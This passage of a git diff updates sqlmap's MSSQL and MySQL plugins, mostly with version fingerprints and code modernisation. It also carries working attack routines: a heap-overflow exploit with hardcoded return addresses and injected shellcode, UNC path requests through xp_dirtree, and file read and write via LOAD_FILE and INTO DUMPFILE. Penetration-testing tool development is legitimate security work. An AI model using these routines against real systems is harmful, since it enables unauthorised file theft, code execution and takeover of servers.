inject.checkBooleanExpression("IS_SRVROLEMEMBER(NULL) IS NULL") if result: infoMsg = "confirming %s" % DBMS.MSSQL logger.info(infoMsg) - for version, check in (("2000", "HOST_NAME()=HOST_NAME()"), \ - ("2005", "XACT_STATE()=XACT_STATE()"), \ - ("2008", "SYSDATETIME()=SYSDATETIME()")): + for version, check in ( + ("Azure", "@@VERSION LIKE '%Azure%'"), + ("2025", "CHARINDEX('17.0.',@@VERSION)>0"), + ("2022", "GREATEST(NULL,NULL) IS NULL"), + ("2019", "CHARINDEX('15.0.',@@VERSION)>0"), + ("2017", "TRIM(NULL) IS NULL"), + ("2016", "ISJSON(NULL) IS NULL"), + ("2014", "CHARINDEX('12.0.',@@VERSION)>0"), + ("2012", "CONCAT(NULL,NULL)=CONCAT(NULL,NULL)"), + ("2008", "SYSDATETIME()=SYSDATETIME()"), + ("2005", "XACT_STATE()=XACT_STATE()"), + ("2000", "HOST_NAME()=HOST_NAME()"), + ): result = inject.checkBooleanExpression(check) if result: Backend.setVersion(version) + break if Backend.getVersion(): setDbms("%s %s" % (DBMS.MSSQL, Backend.getVersion())) @@ -112,7 +119,7 @@ def checkDbms(self): return True else: warnMsg = "the back-end DBMS is not %s" % DBMS.MSSQL - logger.warn(warnMsg) + logger.warning(warnMsg) return False @@ -135,19 +142,24 @@ def checkDbmsOs(self, detailed=False): self.createSupportTbl(self.fileTblName, self.tblField, "varchar(1000)") inject.goStacked("INSERT INTO %s(%s) VALUES (%s)" % (self.fileTblName, self.tblField, "@@VERSION")) - versions = { "2003": ("5.2", (2, 1)), - # TODO: verify this - #"2003": ("6.0", (2, 1)), - "2008": ("7.0", (1,)), - "2000": ("5.0", (4, 3, 2, 1)), - "7": ("6.1", (1, 0)), - "XP": ("5.1", (2, 1)), - "NT": ("4.0", (6, 5, 4, 3, 2, 1)) } + # Reference: https://en.wikipedia.org/wiki/Comparison_of_Microsoft_Windows_versions + # https://en.wikipedia.org/wiki/Windows_NT#Releases + versions = { + "NT": ("4.0", (6, 5, 4, 3, 2, 1)), + "2000": ("5.0", (4, 3, 2, 1)), + "XP": ("5.1", (3, 2, 1)), + "2003": ("5.2", (2, 1)), + "Vista or 2008": ("6.0", (2, 1)), + "7 or 2008 R2": ("6.1", (1, 0)), + "8 or 2012": ("6.2", (0,)), + "8.1 or 2012 R2": ("6.3", (0,)), + "10 or 11 or 2016 or 2019 or 2022": ("10.0", (0,)) + } # Get back-end DBMS underlying operating system version for version, data in versions.items(): - query = "(SELECT LEN(%s) FROM %s WHERE %s " % (self.tblField, self.fileTblName, self.tblField) - query += "LIKE '%Windows NT " + data[0] + "%')>0" + query = "EXISTS(SELECT %s FROM %s WHERE %s " % (self.tblField, self.fileTblName, self.tblField) + query += "LIKE '%Windows NT " + data[0] + "%')" result = inject.checkBooleanExpression(query) if result: @@ -162,7 +174,7 @@ def checkDbmsOs(self, detailed=False): warnMsg = "unable to fingerprint the underlying operating " warnMsg += "system version, assuming it is Windows " warnMsg += "%s Service Pack %d" % (Backend.getOsVersion(), Backend.getOsServicePack()) - logger.warn(warnMsg) + logger.warning(warnMsg) self.cleanup(onlyFileTbl=True) @@ -170,13 +182,12 @@ def checkDbmsOs(self, detailed=False): # Get back-end DBMS underlying operating system service pack sps = versions[Backend.getOsVersion()][1] - for sp in sps: - query = "SELECT LEN(%s) FROM %s WHERE %s " % (self.tblField, self.fileTblName, self.tblField) - query += "LIKE '%Service Pack " + getUnicode(sp) + "%'" - result = inject.goStacked(query) + query = "EXISTS(SELECT %s FROM %s WHERE %s " % (self.tblField, self.fileTblName, self.tblField) + query += "LIKE '%Service Pack " + getUnicode(sp) + "%')" + result = inject.checkBooleanExpression(query) - if result is not None and len(result) > 0 and result[0].isdigit(): + if result: Backend.setOsServicePack(sp) break diff --git a/plugins/dbms/mssqlserver/syntax.py b/plugins/dbms/mssqlserver/syntax.py index 21a0503dcb6..183ce9462c9 100644 --- a/plugins/dbms/mssqlserver/syntax.py +++ b/plugins/dbms/mssqlserver/syntax.py @@ -1,19 +1,24 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ +from lib.core.convert import getOrds from plugins.generic.syntax import Syntax as GenericSyntax class Syntax(GenericSyntax): - def __init__(self): - GenericSyntax.__init__(self) - @staticmethod def escape(expression, quote=True): + """ + >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") == "SELECT CHAR(97)+CHAR(98)+CHAR(99)+CHAR(100)+CHAR(101)+CHAR(102)+CHAR(103)+CHAR(104) FROM foobar" + True + >>> Syntax.escape(u"SELECT 'abcd\xebfgh' FROM foobar") == "SELECT CHAR(97)+CHAR(98)+CHAR(99)+CHAR(100)+NCHAR(235)+CHAR(102)+CHAR(103)+CHAR(104) FROM foobar" + True + """ + def escaper(value): - return "+".join("%s(%d)" % ("CHAR" if ord(value[i]) < 256 else "NCHAR", ord(value[i])) for i in xrange(len(value))) + return "+".join("%s(%d)" % ("CHAR" if _ < 128 else "NCHAR", _) for _ in getOrds(value)) return Syntax._escape(expression, quote, escaper) diff --git a/plugins/dbms/mssqlserver/takeover.py b/plugins/dbms/mssqlserver/takeover.py index 05a9d04312b..53c1b078720 100644 --- a/plugins/dbms/mssqlserver/takeover.py +++ b/plugins/dbms/mssqlserver/takeover.py @@ -1,13 +1,15 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ import binascii from lib.core.common import Backend +from lib.core.compat import xrange +from lib.core.convert import getBytes from lib.core.data import logger from lib.core.exception import SqlmapUnsupportedFeatureException from lib.request import inject @@ -20,32 +22,33 @@ def __init__(self): GenericTakeover.__init__(self) def uncPathRequest(self): - #inject.goStacked("EXEC master..xp_fileexist '%s'" % self.uncPath, silent=True) + # inject.goStacked("EXEC master..xp_fileexist '%s'" % self.uncPath, silent=True) inject.goStacked("EXEC master..xp_dirtree '%s'" % self.uncPath) def spHeapOverflow(self): """ References: - * http://www.microsoft.com/technet/security/bulletin/MS09-004.mspx - * http://support.microsoft.com/kb/959420 + * https://docs.microsoft.com/en-us/security-updates/securitybulletins/2009/ms09-004 + * https://support.microsoft.com/en-us/help/959420/ms09-004-vulnerabilities-in-microsoft-sql-server-could-allow-remote-co """ returns = { - # 2003 Service Pack 0 - "2003-0": (""), + # 2003 Service Pack 0 + "2003-0": (""), - # 2003 Service Pack 1 - "2003-1": ("CHAR(0xab)+CHAR(0x2e)+CHAR(0xe6)+CHAR(0x7c)", "CHAR(0xee)+CHAR(0x60)+CHAR(0xa8)+CHAR(0x7c)", "CHAR(0xb5)+CHAR(0x60)+CHAR(0xa8)+CHAR(0x7c)", "CHAR(0x03)+CHAR(0x1d)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x03)+CHAR(0x1d)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x13)+CHAR(0xe4)+CHAR(0x83)+CHAR(0x7c)", "CHAR(0x1e)+CHAR(0x1d)+CHAR(0x88)+CHAR(0x7c)", "CHAR(0x1e)+CHAR(0x1d)+CHAR(0x88)+CHAR(0x7c)" ), + # 2003 Service Pack 1 + "2003-1": ("CHAR(0xab)+CHAR(0x2e)+CHAR(0xe6)+CHAR(0x7c)", "CHAR(0xee)+CHAR(0x60)+CHAR(0xa8)+CHAR(0x7c)", "CHAR(0xb5)+CHAR(0x60)+CHAR(0xa8)+CHAR(0x7c)", "CHAR(0x03)+CHAR(0x1d)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x03)+CHAR(0x1d)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x13)+CHAR(0xe4)+CHAR(0x83)+CHAR(0x7c)", "CHAR(0x1e)+CHAR(0x1d)+CHAR(0x88)+CHAR(0x7c)", "CHAR(0x1e)+CHAR(0x1d)+CHAR(0x88)+CHAR(0x7c)"), - # 2003 Service Pack 2 updated at 12/2008 - #"2003-2": ("CHAR(0xe4)+CHAR(0x37)+CHAR(0xea)+CHAR(0x7c)", "CHAR(0x15)+CHAR(0xc9)+CHAR(0x93)+CHAR(0x7c)", "CHAR(0x96)+CHAR(0xdc)+CHAR(0xa7)+CHAR(0x7c)", "CHAR(0x73)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x73)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x17)+CHAR(0xf5)+CHAR(0x83)+CHAR(0x7c)", "CHAR(0x1b)+CHAR(0xa0)+CHAR(0x86)+CHAR(0x7c)", "CHAR(0x1b)+CHAR(0xa0)+CHAR(0x86)+CHAR(0x7c)" ), + # 2003 Service Pack 2 updated at 12/2008 + # "2003-2": ("CHAR(0xe4)+CHAR(0x37)+CHAR(0xea)+CHAR(0x7c)", "CHAR(0x15)+CHAR(0xc9)+CHAR(0x93)+CHAR(0x7c)", "CHAR(0x96)+CHAR(0xdc)+CHAR(0xa7)+CHAR(0x7c)", "CHAR(0x73)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x73)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x17)+CHAR(0xf5)+CHAR(0x83)+CHAR(0x7c)", "CHAR(0x1b)+CHAR(0xa0)+CHAR(0x86)+CHAR(0x7c)", "CHAR(0x1b)+CHAR(0xa0)+CHAR(0x86)+CHAR(0x7c)"), - # 2003 Service Pack 2 updated at 05/2009 - "2003-2": ("CHAR(0xc3)+CHAR(0xdb)+CHAR(0x67)+CHAR(0x77)", "CHAR(0x15)+CHAR(0xc9)+CHAR(0x93)+CHAR(0x7c)", "CHAR(0x96)+CHAR(0xdc)+CHAR(0xa7)+CHAR(0x7c)", "CHAR(0x73)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x73)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x47)+CHAR(0xf5)+CHAR(0x83)+CHAR(0x7c)", "CHAR(0x0f)+CHAR(0x31)+CHAR(0x8e)+CHAR(0x7c)", "CHAR(0x0f)+CHAR(0x31)+CHAR(0x8e)+CHAR(0x7c)"), + # 2003 Service Pack 2 updated at 05/2009 + "2003-2": ("CHAR(0xc3)+CHAR(0xdb)+CHAR(0x67)+CHAR(0x77)", "CHAR(0x15)+CHAR(0xc9)+CHAR(0x93)+CHAR(0x7c)", "CHAR(0x96)+CHAR(0xdc)+CHAR(0xa7)+CHAR(0x7c)", "CHAR(0x73)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x73)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x47)+CHAR(0xf5)+CHAR(0x83)+CHAR(0x7c)", "CHAR(0x0f)+CHAR(0x31)+CHAR(0x8e)+CHAR(0x7c)", "CHAR(0x0f)+CHAR(0x31)+CHAR(0x8e)+CHAR(0x7c)"), + + # 2003 Service Pack 2 updated at 09/2009 + # "2003-2": ("CHAR(0xc3)+CHAR(0xc2)+CHAR(0xed)+CHAR(0x7c)", "CHAR(0xf3)+CHAR(0xd9)+CHAR(0xa7)+CHAR(0x7c)", "CHAR(0x99)+CHAR(0xc8)+CHAR(0x93)+CHAR(0x7c)", "CHAR(0x63)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x63)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x17)+CHAR(0xf5)+CHAR(0x83)+CHAR(0x7c)", "CHAR(0xa4)+CHAR(0xde)+CHAR(0x8e)+CHAR(0x7c)", "CHAR(0xa4)+CHAR(0xde)+CHAR(0x8e)+CHAR(0x7c)"), + } - # 2003 Service Pack 2 updated at 09/2009 - #"2003-2": ("CHAR(0xc3)+CHAR(0xc2)+CHAR(0xed)+CHAR(0x7c)", "CHAR(0xf3)+CHAR(0xd9)+CHAR(0xa7)+CHAR(0x7c)", "CHAR(0x99)+CHAR(0xc8)+CHAR(0x93)+CHAR(0x7c)", "CHAR(0x63)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x63)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x17)+CHAR(0xf5)+CHAR(0x83)+CHAR(0x7c)", "CHAR(0xa4)+CHAR(0xde)+CHAR(0x8e)+CHAR(0x7c)", "CHAR(0xa4)+CHAR(0xde)+CHAR(0x8e)+CHAR(0x7c)"), - } addrs = None for versionSp, data in returns.items(): @@ -57,7 +60,7 @@ def spHeapOverflow(self): break - if addrs is None: + if not addrs: errMsg = "sqlmap can not exploit the stored procedure buffer " errMsg += "overflow because it does not have a valid return " errMsg += "code for the underlying operating system (Windows " @@ -65,7 +68,7 @@ def spHeapOverflow(self): raise SqlmapUnsupportedFeatureException(errMsg) shellcodeChar = "" - hexStr = binascii.hexlify(self.shellcodeString[:-1]) + hexStr = binascii.hexlify(getBytes(self.shellcodeString[:-1])) for hexPair in xrange(0, len(hexStr), 2): shellcodeChar += "CHAR(0x%s)+" % hexStr[hexPair:hexPair + 2] diff --git a/plugins/dbms/mysql/__init__.py b/plugins/dbms/mysql/__init__.py index 4f03e754ea0..21e2f4550b0 100644 --- a/plugins/dbms/mysql/__init__.py +++ b/plugins/dbms/mysql/__init__.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ from lib.core.enums import DBMS @@ -23,17 +23,13 @@ class MySQLMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Take def __init__(self): self.excludeDbsList = MYSQL_SYSTEM_DBS self.sysUdfs = { - # UDF name: UDF return data-type - "sys_exec": { "return": "int" }, - "sys_eval": { "return": "string" }, - "sys_bineval": { "return": "int" } - } + # UDF name: UDF return data-type + "sys_exec": {"return": "int"}, + "sys_eval": {"return": "string"}, + "sys_bineval": {"return": "int"} + } - Syntax.__init__(self) - Fingerprint.__init__(self) - Enumeration.__init__(self) - Filesystem.__init__(self) - Miscellaneous.__init__(self) - Takeover.__init__(self) + for cls in self.__class__.__bases__: + cls.__init__(self) unescaper[DBMS.MYSQL] = Syntax.escape diff --git a/plugins/dbms/mysql/connector.py b/plugins/dbms/mysql/connector.py index 54327d9d95e..459ff23d5bc 100644 --- a/plugins/dbms/mysql/connector.py +++ b/plugins/dbms/mysql/connector.py @@ -1,17 +1,20 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ try: import pymysql -except ImportError: +except: pass import logging +import struct +import sys +from lib.core.common import getSafeExString from lib.core.data import conf from lib.core.data import logger from lib.core.exception import SqlmapConnectionException @@ -19,34 +22,30 @@ class Connector(GenericConnector): """ - Homepage: http://code.google.com/p/pymysql/ - User guide: http://code.google.com/p/pymysql/ - API: http://code.google.com/p/pymysql/ - Debian package: <none> + Homepage: https://github.com/PyMySQL/PyMySQL + User guide: https://pymysql.readthedocs.io/en/latest/ + Debian package: python3-pymysql License: MIT Possible connectors: http://wiki.python.org/moin/MySQL """ - def __init__(self): - GenericConnector.__init__(self) - def connect(self): self.initConnection() try: - self.connector = pymysql.connect(host=self.hostname, user=self.user, passwd=self.password, db=self.db, port=self.port, connect_timeout=conf.timeout, use_unicode=True) - except (pymysql.OperationalError, pymysql.InternalError), msg: - raise SqlmapConnectionException(msg[1]) + self.connector = pymysql.connect(host=self.hostname, user=self.user, passwd=self.password.encode(sys.stdin.encoding), db=self.db, port=self.port, connect_timeout=conf.timeout, use_unicode=True) + except (pymysql.OperationalError, pymysql.InternalError, pymysql.ProgrammingError, struct.error) as ex: + raise SqlmapConnectionException(getSafeExString(ex)) self.initCursor() - self.connected() + self.printConnected() def fetchall(self): try: return self.cursor.fetchall() - except pymysql.ProgrammingError, msg: - logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[1]) + except pymysql.ProgrammingError as ex: + logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % getSafeExString(ex)) return None def execute(self, query): @@ -55,10 +54,10 @@ def execute(self, query): try: self.cursor.execute(query) retVal = True - except (pymysql.OperationalError, pymysql.ProgrammingError), msg: - logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[1]) - except pymysql.InternalError, msg: - raise SqlmapConnectionException(msg[1]) + except (pymysql.OperationalError, pymysql.ProgrammingError) as ex: + logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % getSafeExString(ex)) + except pymysql.InternalError as ex: + raise SqlmapConnectionException(getSafeExString(ex)) self.connector.commit() diff --git a/plugins/dbms/mysql/enumeration.py b/plugins/dbms/mysql/enumeration.py index 6edc88d1463..129b1e6106a 100644 --- a/plugins/dbms/mysql/enumeration.py +++ b/plugins/dbms/mysql/enumeration.py @@ -1,12 +1,11 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ from plugins.generic.enumeration import Enumeration as GenericEnumeration class Enumeration(GenericEnumeration): - def __init__(self): - GenericEnumeration.__init__(self) + pass diff --git a/plugins/dbms/mysql/filesystem.py b/plugins/dbms/mysql/filesystem.py index 301fd3c69a8..acde3cc35c9 100644 --- a/plugins/dbms/mysql/filesystem.py +++ b/plugins/dbms/mysql/filesystem.py @@ -1,54 +1,61 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ +from lib.core.agent import agent +from lib.core.common import getSQLSnippet from lib.core.common import isNumPosStrValue from lib.core.common import isTechniqueAvailable +from lib.core.common import popValue +from lib.core.common import pushValue from lib.core.common import randomStr from lib.core.common import singleTimeWarnMessage +from lib.core.compat import xrange from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger +from lib.core.decorators import stackedmethod from lib.core.enums import CHARSET_TYPE +from lib.core.enums import DBMS from lib.core.enums import EXPECTED from lib.core.enums import PAYLOAD from lib.core.enums import PLACE from lib.core.exception import SqlmapNoneDataException from lib.request import inject +from lib.request.connect import Connect as Request from lib.techniques.union.use import unionUse from plugins.generic.filesystem import Filesystem as GenericFilesystem class Filesystem(GenericFilesystem): - def __init__(self): - GenericFilesystem.__init__(self) - def nonStackedReadFile(self, rFile): - infoMsg = "fetching file: '%s'" % rFile - logger.info(infoMsg) + if not kb.bruteMode: + infoMsg = "fetching file: '%s'" % rFile + logger.info(infoMsg) - result = inject.getValue("SELECT HEX(LOAD_FILE('%s'))" % rFile, charsetType=CHARSET_TYPE.HEXADECIMAL) + result = inject.getValue("HEX(LOAD_FILE('%s'))" % rFile, charsetType=CHARSET_TYPE.HEXADECIMAL) return result - def stackedReadFile(self, rFile): - infoMsg = "fetching file: '%s'" % rFile - logger.info(infoMsg) + def stackedReadFile(self, remoteFile): + if not kb.bruteMode: + infoMsg = "fetching file: '%s'" % remoteFile + logger.info(infoMsg) self.createSupportTbl(self.fileTblName, self.tblField, "longtext") self.getRemoteTempPath() tmpFile = "%s/tmpf%s" % (conf.tmpPath, randomStr(lowercase=True)) - debugMsg = "saving hexadecimal encoded content of file '%s' " % rFile + debugMsg = "saving hexadecimal encoded content of file '%s' " % remoteFile debugMsg += "into temporary file '%s'" % tmpFile logger.debug(debugMsg) - inject.goStacked("SELECT HEX(LOAD_FILE('%s')) INTO DUMPFILE '%s'" % (rFile, tmpFile)) + inject.goStacked("SELECT HEX(LOAD_FILE('%s')) INTO DUMPFILE '%s'" % (remoteFile, tmpFile)) debugMsg = "loading the content of hexadecimal encoded file " - debugMsg += "'%s' into support table" % rFile + debugMsg += "'%s' into support table" % remoteFile logger.debug(debugMsg) inject.goStacked("LOAD DATA INFILE '%s' INTO TABLE %s FIELDS TERMINATED BY '%s' (%s)" % (tmpFile, self.fileTblName, randomStr(10), self.tblField)) @@ -56,57 +63,89 @@ def stackedReadFile(self, rFile): if not isNumPosStrValue(length): warnMsg = "unable to retrieve the content of the " - warnMsg += "file '%s'" % rFile + warnMsg += "file '%s'" % remoteFile if conf.direct or isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION): - warnMsg += ", going to fall-back to simpler UNION technique" - logger.warn(warnMsg) - result = self.nonStackedReadFile(rFile) + if not kb.bruteMode: + warnMsg += ", going to fall-back to simpler UNION technique" + logger.warning(warnMsg) + result = self.nonStackedReadFile(remoteFile) else: raise SqlmapNoneDataException(warnMsg) else: length = int(length) - sustrLen = 1024 + chunkSize = 1024 - if length > sustrLen: + if length > chunkSize: result = [] - for i in xrange(1, length, sustrLen): - chunk = inject.getValue("SELECT MID(%s, %d, %d) FROM %s" % (self.tblField, i, sustrLen, self.fileTblName), unpack=False, resumeValue=False, charsetType=CHARSET_TYPE.HEXADECIMAL) - + for i in xrange(1, length, chunkSize): + chunk = inject.getValue("SELECT MID(%s, %d, %d) FROM %s" % (self.tblField, i, chunkSize, self.fileTblName), unpack=False, resumeValue=False, charsetType=CHARSET_TYPE.HEXADECIMAL) result.append(chunk) else: result = inject.getValue("SELECT %s FROM %s" % (self.tblField, self.fileTblName), resumeValue=False, charsetType=CHARSET_TYPE.HEXADECIMAL) return result - def unionWriteFile(self, wFile, dFile, fileType, forceCheck=False): + @stackedmethod + def unionWriteFile(self, localFile, remoteFile, fileType, forceCheck=False): logger.debug("encoding file to its hexadecimal string value") - fcEncodedList = self.fileEncode(wFile, "hex", True) + fcEncodedList = self.fileEncode(localFile, "hex", True) fcEncodedStr = fcEncodedList[0] fcEncodedStrLen = len(fcEncodedStr) if kb.injection.place == PLACE.GET and fcEncodedStrLen > 8000: - warnMsg = "the injection is on a GET parameter and the file " + warnMsg = "as the injection is on a GET parameter and the file " warnMsg += "to be written hexadecimal value is %d " % fcEncodedStrLen warnMsg += "bytes, this might cause errors in the file " warnMsg += "writing process" - logger.warn(warnMsg) + logger.warning(warnMsg) - debugMsg = "exporting the %s file content to file '%s'" % (fileType, dFile) + debugMsg = "exporting the %s file content to file '%s'" % (fileType, remoteFile) logger.debug(debugMsg) - sqlQuery = "%s INTO DUMPFILE '%s'" % (fcEncodedStr, dFile) + pushValue(kb.forceWhere) + kb.forceWhere = PAYLOAD.WHERE.NEGATIVE + sqlQuery = "%s INTO DUMPFILE '%s'" % (fcEncodedStr, remoteFile) unionUse(sqlQuery, unpack=False) + kb.forceWhere = popValue() warnMsg = "expect junk characters inside the " warnMsg += "file as a leftover from UNION query" singleTimeWarnMessage(warnMsg) - return self.askCheckWrittenFile(wFile, dFile, forceCheck) + return self.askCheckWrittenFile(localFile, remoteFile, forceCheck) - def stackedWriteFile(self, wFile, dFile, fileType, forceCheck=False): + def linesTerminatedWriteFile(self, localFile, remoteFile, fileType, forceCheck=False): + logger.debug("encoding file to its hexadecimal string value") + + fcEncodedList = self.fileEncode(localFile, "hex", True) + fcEncodedStr = fcEncodedList[0][2:] + fcEncodedStrLen = len(fcEncodedStr) + + if kb.injection.place == PLACE.GET and fcEncodedStrLen > 8000: + warnMsg = "the injection is on a GET parameter and the file " + warnMsg += "to be written hexadecimal value is %d " % fcEncodedStrLen + warnMsg += "bytes, this might cause errors in the file " + warnMsg += "writing process" + logger.warning(warnMsg) + + debugMsg = "exporting the %s file content to file '%s'" % (fileType, remoteFile) + logger.debug(debugMsg) + + query = getSQLSnippet(DBMS.MYSQL, "write_file_limit", OUTFILE=remoteFile, HEXSTRING=fcEncodedStr) + query = agent.prefixQuery(query) # Note: No need for suffix as 'write_file_limit' already ends with comment (required) + payload = agent.payload(newValue=query) + Request.queryPage(payload, content=False, raise404=False, silent=True, noteResponseTime=False) + + warnMsg = "expect junk characters inside the " + warnMsg += "file as a leftover from original query" + singleTimeWarnMessage(warnMsg) + + return self.askCheckWrittenFile(localFile, remoteFile, forceCheck) + + def stackedWriteFile(self, localFile, remoteFile, fileType, forceCheck=False): debugMsg = "creating a support table to write the hexadecimal " debugMsg += "encoded file to" logger.debug(debugMsg) @@ -114,7 +153,7 @@ def stackedWriteFile(self, wFile, dFile, fileType, forceCheck=False): self.createSupportTbl(self.fileTblName, self.tblField, "longblob") logger.debug("encoding file to its hexadecimal string value") - fcEncodedList = self.fileEncode(wFile, "hex", False) + fcEncodedList = self.fileEncode(localFile, "hex", False) debugMsg = "forging SQL statements to write the hexadecimal " debugMsg += "encoded file to the support table" @@ -124,13 +163,15 @@ def stackedWriteFile(self, wFile, dFile, fileType, forceCheck=False): logger.debug("inserting the hexadecimal encoded file to the support table") + inject.goStacked("SET GLOBAL max_allowed_packet = %d" % (1024 * 1024)) # 1MB (Note: https://github.com/sqlmapproject/sqlmap/issues/3230) + for sqlQuery in sqlQueries: inject.goStacked(sqlQuery) - debugMsg = "exporting the %s file content to file '%s'" % (fileType, dFile) + debugMsg = "exporting the %s file content to file '%s'" % (fileType, remoteFile) logger.debug(debugMsg) # Reference: http://dev.mysql.com/doc/refman/5.1/en/select.html - inject.goStacked("SELECT %s FROM %s INTO DUMPFILE '%s'" % (self.tblField, self.fileTblName, dFile), silent=True) + inject.goStacked("SELECT %s FROM %s INTO DUMPFILE '%s'" % (self.tblField, self.fileTblName, remoteFile), silent=True) - return self.askCheckWrittenFile(wFile, dFile, forceCheck) + return self.askCheckWrittenFile(localFile, remoteFile, forceCheck) diff --git a/plugins/dbms/mysql/fingerprint.py b/plugins/dbms/mysql/fingerprint.py index 9987cabad9b..1876779edef 100644 --- a/plugins/dbms/mysql/fingerprint.py +++ b/plugins/dbms/mysql/fingerprint.py @@ -1,24 +1,27 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ import re from lib.core.common import Backend from lib.core.common import Format -from lib.core.common import getUnicode -from lib.core.common import randomInt +from lib.core.common import hashDBRetrieve +from lib.core.common import hashDBWrite +from lib.core.compat import xrange +from lib.core.convert import getUnicode from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger from lib.core.enums import DBMS +from lib.core.enums import FORK +from lib.core.enums import HASHDB_KEYS from lib.core.enums import OS from lib.core.session import setDbms from lib.core.settings import MYSQL_ALIASES -from lib.core.settings import UNKNOWN_DBMS_VERSION from lib.request import inject from plugins.generic.fingerprint import Fingerprint as GenericFingerprint @@ -30,78 +33,98 @@ def _commentCheck(self): infoMsg = "executing %s comment injection fingerprint" % DBMS.MYSQL logger.info(infoMsg) - randInt = randomInt() - result = inject.checkBooleanExpression("%d=%d/* NoValue */" % (randInt, randInt)) + result = inject.checkBooleanExpression("[RANDNUM]=[RANDNUM]/* NoValue */") if not result: warnMsg = "unable to perform %s comment injection" % DBMS.MYSQL - logger.warn(warnMsg) + logger.warning(warnMsg) return None - # MySQL valid versions updated on 04/2011 + # Reference: https://downloads.mysql.com/archives/community/ + # Reference: https://dev.mysql.com/doc/relnotes/mysql/<major>.<minor>/en/ + versions = ( - (32200, 32235), # MySQL 3.22 - (32300, 32359), # MySQL 3.23 - (40000, 40032), # MySQL 4.0 - (40100, 40131), # MySQL 4.1 - (50000, 50092), # MySQL 5.0 - (50100, 50156), # MySQL 5.1 - (50400, 50404), # MySQL 5.4 - (50500, 50521), # MySQL 5.5 - (50600, 50604), # MySQL 5.6 - (60000, 60014), # MySQL 6.0 - ) - - index = -1 - for i in xrange(len(versions)): - element = versions[i] - version = element[0] - randInt = randomInt() - version = getUnicode(version) - result = inject.checkBooleanExpression("%d=%d/*!%s AND %d=%d*/" % (randInt, randInt, version, randInt, randInt + 1)) - - if result: - break - else: - index += 1 + (90300, 90302), # MySQL 9.3 + (90200, 90202), # MySQL 9.2 + (90100, 90102), # MySQL 9.1 + (90000, 90002), # MySQL 9.0 + (80400, 80406), # MySQL 8.4 + (80300, 80302), # MySQL 8.3 + (80200, 80202), # MySQL 8.2 + (80100, 80102), # MySQL 8.1 + (80000, 80043), # MySQL 8.0 + (60000, 60014), # MySQL 6.0 + (50700, 50745), # MySQL 5.7 + (50600, 50652), # MySQL 5.6 + (50500, 50563), # MySQL 5.5 + (50400, 50404), # MySQL 5.4 + (50100, 50174), # MySQL 5.1 + (50000, 50097), # MySQL 5.0 + (40100, 40131), # MySQL 4.1 + (40000, 40032), # MySQL 4.0 + (32300, 32359), # MySQL 3.23 + (32200, 32235), # MySQL 3.22 + ) + + found = False + for candidate in versions: + result = inject.checkBooleanExpression("[RANDNUM]=[RANDNUM]/*!%d AND [RANDNUM1]=[RANDNUM2]*/" % candidate[0]) - if index >= 0: - prevVer = None + if not result: + found = True + break - for version in xrange(versions[index][0], versions[index][1] + 1): - randInt = randomInt() + if found: + for version in xrange(candidate[1], candidate[0] - 1, -1): version = getUnicode(version) - result = inject.checkBooleanExpression("%d=%d/*!%s AND %d=%d*/" % (randInt, randInt, version, randInt, randInt + 1)) - - if result: - if not prevVer: - prevVer = version + result = inject.checkBooleanExpression("[RANDNUM]=[RANDNUM]/*!%s AND [RANDNUM1]=[RANDNUM2]*/" % version) + if not result: if 